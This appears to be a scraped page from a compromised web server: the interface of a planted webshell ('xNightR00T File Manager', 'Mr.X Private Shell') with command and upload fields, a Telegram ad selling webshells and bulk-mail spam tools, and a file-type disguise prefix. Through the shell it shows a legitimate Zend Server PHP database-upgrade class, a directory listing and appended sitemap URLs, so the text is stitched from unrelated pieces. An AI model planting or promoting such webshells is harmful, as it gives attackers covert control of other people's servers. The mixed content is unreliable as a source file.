xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
<?php

require_once dirname(__FILE__) . "/zs_component_upgrader.php";

class StatisticsDBHandler extends ZSComponentUpgrader {

    protected function getSqliteDbName($version = "6.0.0") {
        return "statistics.db";
    }

    protected function getMysqlSqlFilenames() {
        return array("statistics_mysql_create_database.sql", "stats_mysql_fixtures.sql");
    }

    protected function getSqliteSqlFilenames() {
        return array("statistics_sqlite_create_database.sql", "stats_sqlite_fixtures.sql");
    }

    protected function upgradeSqlite() {

        $fromVersion = $this->copySqliteFromPreviousVersions();
        if ($fromVersion) {
            message("Upgrade from $fromVersion");
        } else {
			$this->createCleanSqliteDatabase();
			return;
		}

        $dbh = $this->getSqliteDbh();
        $currentSchemaVersion = $this->getSqliteSchemaVersion();
        if (version_compare($currentSchemaVersion, "9.1.0", "<")) {
			$dbh->exec('
			CREATE TABLE IF NOT EXISTS  jobqueue_executions_stats_daily (
			id INTEGER  NOT NULL PRIMARY KEY AUTOINCREMENT,
			entry_type_id      integer,
			app_id             integer,
			queue_id           integer,
			counter_value      float,
			from_time          integer,
			until_time         integer,
			samples            integer
			);

			CREATE TABLE IF NOT EXISTS  jobqueue_executions_stats_weekly (
					id INTEGER  NOT NULL PRIMARY KEY AUTOINCREMENT,
					entry_type_id      integer,
					app_id             integer,
					queue_id           integer,
					counter_value      float,
					from_time          integer,
					until_time         integer,
					samples            integer
					);

			CREATE TABLE IF NOT EXISTS  jobqueue_executions_stats_monthly (
					id INTEGER  NOT NULL PRIMARY KEY AUTOINCREMENT,
					entry_type_id      integer,
					app_id             integer,
					queue_id           integer,
					counter_value      float,
					from_time          integer,
					until_time         integer,
					samples            integer
					);

			CREATE UNIQUE INDEX IF NOT EXISTS IDX_JQ_INSIGHTS_DAILY_KEY on jobqueue_executions_stats_daily(entry_type_id, from_time, app_id, queue_id);
			CREATE UNIQUE INDEX IF NOT EXISTS IDX_JQ_INSIGHTS_WEEKLY_KEY on jobqueue_executions_stats_weekly(entry_type_id, from_time, app_id, queue_id);
			CREATE UNIQUE INDEX IF NOT EXISTS IDX_JQ_INSIGHTS_MONTHLY_KEY on jobqueue_executions_stats_monthly(entry_type_id, from_time, app_id, queue_id);

			');
            $this->setSqliteSchemaVersion($dbh, "9.1.0");
        }

		$currentSchemaVersion = $this->getSqliteSchemaVersion();
        if (version_compare($currentSchemaVersion, "2018.0.0", "<")) {

			$dbh->exec('
			CREATE TABLE IF NOT EXISTS jobqueue_executions_first_jobs (
				id INTEGER  NOT NULL PRIMARY KEY AUTOINCREMENT,
				first_time_updated integer NOT NULL,
				app_id             integer NOT NULL
			);
			CREATE UNIQUE INDEX IF NOT EXISTS  IDX_FIRST_JOBS on jobqueue_executions_first_jobs (first_time_updated, app_id);

			DROP INDEX IDX_JQ_INSIGHTS_DAILY_KEY;
			DROP INDEX IDX_JQ_INSIGHTS_WEEKLY_KEY;
			DROP INDEX IDX_JQ_INSIGHTS_MONTHLY_KEY;

			ALTER TABLE jobqueue_executions_stats_daily ADD job_type INTEGER DEFAULT 0;
			ALTER TABLE jobqueue_executions_stats_weekly ADD job_type INTEGER DEFAULT 0;
			ALTER TABLE jobqueue_executions_stats_monthly ADD job_type INTEGER DEFAULT 0;

			CREATE UNIQUE INDEX IF NOT EXISTS IDX_JQ_INSIGHTS_DAILY_KEY on jobqueue_executions_stats_daily(entry_type_id, from_time, app_id, queue_id, job_type);
			CREATE UNIQUE INDEX IF NOT EXISTS IDX_JQ_INSIGHTS_WEEKLY_KEY on jobqueue_executions_stats_weekly(entry_type_id, from_time, app_id, queue_id, job_type);
			CREATE UNIQUE INDEX IF NOT EXISTS IDX_JQ_INSIGHTS_MONTHLY_KEY on jobqueue_executions_stats_monthly(entry_type_id, from_time, app_id, queue_id, job_type);

			');

            $this->setSqliteSchemaVersion($dbh, "2018.0.0");
        }
    }

    public function getComponent() { return "statisics"; }

	public function getSchemaVersion() { return "2018.0.0"; }

	public function getMysqlSchemaVersion() {
		$dbh = $this->getMySqlDbh();
        $res = $dbh->query("SELECT property_value FROM schema_properties WHERE property = 'STATS_SCHEMA_VERSION'")->fetchAll();
        foreach ($res as $row) {
            return $row['property_value'];
        }

        return false;
    }

    public function getSqliteSchemaVersion() {
		$dbh = $this->getSqliteDbh();
        foreach ($dbh->query("SELECT value FROM schema_properties where name='version'") as $row) {
            $dbCurrentVersion = $row['value'];
        }
        message("Found sqlite current version $dbCurrentVersion");
        return $this->getParsedVersionString($dbCurrentVersion);
    }

    public function setSqliteSchemaVersion($dbh, $version) {
        $dbh->exec("UPDATE schema_properties set value='{$version}' where name='version'");
        message("Setting sqlite current version $version");
    }

    public function setMysqlSchemaVersion($dbh, $version) {
        $dbh->exec("REPLACE INTO schema_properties (property, property_value) VALUES('STATS_SCHEMA_VERSION', '{$version}')");
    }

    protected function upgradeMysql() {

        $upgradeFromZSVersion = $this->getUpgradeFromVersion();

        $dbh = $this->getMySqlDbh();
        if (!$dbh) {
            return;
        }

        $currentSchemaVersion = $this->getMysqlSchemaVersion();
        if (version_compare($currentSchemaVersion, "9.1.0", "<")) {
            message("Upgrading MYSQL tables to 9.1.0");
            $dbh->exec('
            CREATE TABLE jobqueue_executions_stats_daily (
                    id BIGINT  NOT NULL PRIMARY KEY AUTO_INCREMENT,
                    entry_type_id      integer,
                    app_id             integer,
                    queue_id           integer,
                    counter_value      float,
                    from_time          integer,
                    until_time         integer,
                    samples            integer
                    ) ENGINE=Innodb;

            CREATE TABLE jobqueue_executions_stats_weekly (
                    id BIGINT NOT NULL PRIMARY KEY AUTO_INCREMENT,
                    entry_type_id      integer,
                    app_id             integer,
                    queue_id           integer,
                    counter_value      float,
                    from_time          integer,
                    until_time         integer,
                    samples            integer
                    ) ENGINE=Innodb;

            CREATE TABLE jobqueue_executions_stats_monthly (
                    id BIGINT  NOT NULL PRIMARY KEY AUTO_INCREMENT,
                    entry_type_id      integer,
                    app_id             integer,
                    queue_id           integer,
                    counter_value      float,
                    from_time          integer,
                    until_time         integer,
                    samples            integer
                    ) ENGINE=Innodb;


            CREATE UNIQUE INDEX IDX_JQ_INSIGHTS_DAILY_KEY on jobqueue_executions_stats_daily(entry_type_id, from_time, app_id, queue_id);
            CREATE UNIQUE INDEX IDX_JQ_INSIGHTS_WEEKLY_KEY on jobqueue_executions_stats_weekly(entry_type_id, from_time, app_id, queue_id);
            CREATE UNIQUE INDEX IDX_JQ_INSIGHTS_MONTHLY_KEY on jobqueue_executions_stats_monthly(entry_type_id, from_time, app_id, queue_id);

            ');

            $this->setMysqlSchemaVersion($dbh, "9.1.0");
        }


        $currentSchemaVersion = $this->getMysqlSchemaVersion();
        if (version_compare($currentSchemaVersion, "2018.0.0", "<")) {
            message("Statistics: upgrading MYSQL tables to 2018.0.0");
            $dbh->exec('
                CREATE TABLE IF NOT EXISTS jobqueue_executions_first_jobs (
					id INTEGER  NOT NULL PRIMARY KEY AUTO_INCREMENT,
					first_time_updated integer NOT NULL,
					app_id             integer NOT NULL
				);
				CREATE UNIQUE INDEX IDX_FIRST_JOBS on jobqueue_executions_first_jobs (first_time_updated, app_id);

				DROP INDEX IDX_JQ_INSIGHTS_DAILY_KEY ON jobqueue_executions_stats_daily;
				DROP INDEX IDX_JQ_INSIGHTS_WEEKLY_KEY ON jobqueue_executions_stats_weekly;
				DROP INDEX IDX_JQ_INSIGHTS_MONTHLY_KEY ON jobqueue_executions_stats_monthly;

				ALTER TABLE jobqueue_executions_stats_daily ADD job_type INTEGER DEFAULT 0;
				ALTER TABLE jobqueue_executions_stats_weekly ADD job_type INTEGER DEFAULT 0;
				ALTER TABLE jobqueue_executions_stats_monthly ADD job_type INTEGER DEFAULT 0;

				CREATE UNIQUE INDEX IDX_JQ_INSIGHTS_DAILY_KEY on jobqueue_executions_stats_daily(entry_type_id, from_time, app_id, queue_id, job_type);
				CREATE UNIQUE INDEX IDX_JQ_INSIGHTS_WEEKLY_KEY on jobqueue_executions_stats_weekly(entry_type_id, from_time, app_id, queue_id, job_type);
				CREATE UNIQUE INDEX IDX_JQ_INSIGHTS_MONTHLY_KEY on jobqueue_executions_stats_monthly(entry_type_id, from_time, app_id, queue_id, job_type);
            ');
            $this->setMysqlSchemaVersion($dbh, "2018.0.0");
        }

    }

    public function upgrade() {
        $this->upgradeSqlite();

        if ($this->isClusterUpgrade()) {
            $this->upgradeMysql();
        }
    }

}

?>

Filemanager

Name Type Size Permission Actions
azure-plugins Folder 0755
minify Folder 0755
plugins Folder 0755
zray-cleanup-scripts Folder 0755
devbar_footer.html File 18.69 KB 0644
devbar_footer_azure.html File 16.58 KB 0644
devbar_footer_sa.html File 16.54 KB 0644
devbar_header.html File 1.37 KB 0644
zend_apc_wrapper.php File 2.01 KB 0644
zend_modify_vhost.php File 26.11 KB 0644
zs_apm_db_handler.php File 3.59 KB 0644
zs_component_upgrader.php File 17.99 KB 0644
zs_create_databases.php File 7.69 KB 0644
zs_db_settings.php File 2.15 KB 0644
zs_deployment_db_handler.php File 20.77 KB 0644
zs_devbar_db_handler.php File 3.22 KB 0644
zs_gui_db_handler.php File 15.35 KB 0644
zs_ini_parser.php File 14.91 KB 0644
zs_jq_db_handler.php File 11.81 KB 0644
zs_maintenance.php File 31.99 KB 0644
zs_merge_ini.php File 9.37 KB 0644
zs_monitor_2019_0_0_db_handler.php File 2.83 KB 0644
zs_monitor_db_handler.php File 5.44 KB 0644
zs_optimize_tables.php File 2.02 KB 0644
zs_pagecache_db_handler.php File 2.61 KB 0644
zs_pagecache_purge_db_handler.php File 1.57 KB 0644
zs_product_definitions.php File 65 B 0644
zs_statistics_db_handler.php File 9.05 KB 0644
zs_statsd_db_handler.php File 2.13 KB 0644
zs_tracing_db_handler.php File 3.53 KB 0644
zs_zsd_db_handler.php File 43.89 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml